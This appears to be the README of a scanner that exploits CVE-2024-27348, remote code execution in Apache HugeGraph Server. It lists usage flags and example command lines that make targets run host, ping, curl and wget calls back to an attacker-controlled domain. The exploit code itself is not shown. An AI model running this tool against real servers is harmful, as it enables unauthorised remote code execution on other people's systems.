For Ethical Usages only, Any harmful or malicious activities are not allowed. And it's your own responsability
Apache HugeGraph Server RCE Scanner ( CVE-2024-27348 ), The Scanner will run 4 commands on the target (host
,ping
,curl
,wget
), As in case one of the utilities not found.
usage: [-h] [--file FILE] [--target TARGET] [--port PORT] [--domain DOMAIN]
Exploit CVE-2024-27348 Gremlin RCE in HugeGraph server from 1.0.0 Before 1.3.0
optional arguments:
-h, --help show this help message and exit
--file FILE, -f FILE File containing target addresses and ports W/ the follwoing format: http://target,port e.x: http://localhost,8080
--target TARGET, -t TARGET
Target IP address/domain
--port PORT, -p PORT Target port
--domain DOMAIN, -d DOMAIN
Attacker domain (Your own domain to check ping/requests log)
python3 CVE-2024-27348_Scanner.py -t http(s)://target_address -p port -d your_domain/ip
python3 CVE-2024-27348_Scanner.py -f targets_file -d your_domain/ip
- File content format example in
targets.txt